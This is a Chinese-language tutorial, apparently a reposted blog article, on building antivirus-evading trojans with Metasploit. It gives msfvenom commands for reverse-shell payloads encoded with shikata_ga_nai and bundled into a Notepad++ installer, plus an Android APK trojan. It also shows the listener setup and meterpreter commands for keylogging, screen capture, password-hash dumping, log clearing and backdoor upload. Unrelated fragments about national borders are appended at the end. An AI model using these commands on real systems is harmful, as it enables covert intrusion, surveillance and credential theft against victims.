
1、使exe避免杀死木马序言
Anti-Virus技术的全称是Anti-Virus,它是指可以防止病毒木马被反病毒软件检测和杀死的技术。由于反病毒技术涵盖了广泛的技术,包括反汇编,逆向工程和系统漏洞等技术,因此内容基本上是修改病毒的内容,并改变木马的特征,从而避免了对病毒的检测和查杀。防病毒软件。
MSF编码
在Meatsploit框架下避免杀死的一种方法是使用MSF编码器。它的功能是重新排列攻击有效载荷文件并对其进行编码,更改可执行文件中的代码形状,并避免被防病毒软件识别。 MSF编码器可以重新编码原始可执行程序以生成新的二进制文件。文件运行后,MSF编码器会将原始程序解码到内存中并执行。
1.1视图编码格式

在Kali终端中输入msfvemon -l编码器以列出所有可用的编码格式。应该注意的是,并不是所有的编码方法都适用于Windows系统。建议使用x86 / shikata_ga_nai格式

1.2制作反杀木马
由于容易感染防病毒软件并将其杀死,因此有必要将木马捆绑到正常软件中。这里我们以记事本为例。
裸奔木马

1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=1234 -f exe > /root/test.exe
反杀木马
1 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.20.2 LPORT=3333 -e x86/shikata_ga_nai -x npp.7.8.6.Installer.exe -i 12 -f exe -o /root/npp1.exe

生成exe木马文件


1.3运行msf监视模块
1 msfconsole 2 use multi/handler4 set payload windows/shell_reverse_tcp 5 set LHOST 10.10.20.2 6 set LPORT 3333 7 exploit
1.4运行木马程序
启用对Kali的监视,执行刚刚在客户端上生成的木马文件,并自动连接到Kali,然后您就可以远程控制客户端



1 meterpreter下的命令: 2 getwd 当前目录 3 dir 查看所有文件 4 cat c:\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\) 5 search -f cmd.exe (搜索名为cmd.exe文件所在目录) 6 upload /root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件 7 download c:\123txt /root 下载文件 8 clearev 清除日志 9 getuid 当前用户 10 ps 查看所用进程 11 kill 杀死某个进程 12 sysinfo 系统信息 13 14 键盘记录 15 keyscan_start 开始键盘记录 16 keyscan_dump 查看结果 17 keyscan_stop 18 19 屏幕截图 20 screenshot 21 22 屏幕监控 23 run vnc 24 25 获取密文密码 26 hashdump 27 28 shell 29 获取shell,进入cmd
2、MSF制作Android木马程序2.1制作apk木马程序
1 msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.105.184 LPORT=5555 R > /root/apk.apk
2.2其他步骤,请参考上述步骤2.3命令
sysinfo
有关更多命令,请使用help命令查看
本文来自电脑杂谈,转载请注明本文网址:
http://www.pc-fly.com/a/bofangqi/article-319964-1.html
一如当年的航空识别区
皇城脚下岂容他人放肆
国家的概念除了在生死存亡之时格外强烈外